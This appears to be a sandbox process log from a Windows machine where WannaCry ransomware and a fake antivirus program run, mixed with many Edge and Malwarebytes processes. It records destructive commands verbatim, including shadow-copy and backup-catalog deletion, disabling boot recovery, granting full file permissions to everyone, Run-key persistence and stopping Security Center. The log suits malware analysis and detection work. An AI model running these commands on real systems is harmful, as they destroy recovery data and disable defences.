"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6728 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6624 /prefetch:2
C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 92371711322109.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Downloads\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hijlbxdnsg426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hijlbxdnsg426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status on true /updatesubstatus none /scansubstatus none /settingssubstatus none
C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\AppData\LocalLow\IGDump\jewzhlkrnqyathxklnydxjzurgkqaubq\ig.exe
ig.exe timer 4000 sqytmuflycrkftyiomlmctrbnyjsqfxx.ext
C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\LocalLow\IGDump\ermwdkqkmvirqsylfzwcpextxxzqrhza\ig.exe
ig.exe timer 4000 yphwqepbjsqxzuobzevinftoebvzbumw.ext
C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\@[email protected]
C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5524 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6628 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5832 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,2110855219535197877,17869204900508044559,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:2
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
C:\WINDOWS\302746537.exe
"C:\WINDOWS\302746537.exe"
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F8F.tmp\302746537.bat" "
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s c:\windows\comctl32.ocx
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s c:\windows\mscomctl.ocx
\??\c:\windows\antivirus-platinum.exe
c:\windows\antivirus-platinum.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h c:\windows\antivirus-platinum.exe
C:\Windows\SysWOW64\net.exe
net stop wscsvc
C:\Windows\SysWOW64\net.exe
net stop winmgmt /y
C:\Windows\SysWOW64\net.exe
net start winmgmt
C:\Windows\SysWOW64\net.exe
net start wscsvc
C:\Windows\SysWOW64\Wbem\mofcomp.exe
mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wscsvc
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop winmgmt /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start winmgmt
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start wscsvc
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4a0
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\1104608860c54545a989b33024c7052f /t 5196 /p 5068
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe
"C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\Users\Admin\AppData\LocalLow\IGDump\lnxhcbwaryuevxbbpekxrxklkrkslvbc\ig.exe
ig.exe timer 4000 jjmirfabmnuewfowhvyksarxoxszljjv.ext
C:\Users\Admin\AppData\LocalLow\IGDump\davouwkqqovaochrqulzzbfmowcvilmz\ig.exe
ig.exe timer 4000 bwrgjvjfzvucdzfuvwdtsoltnbbfqbpd.ext
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
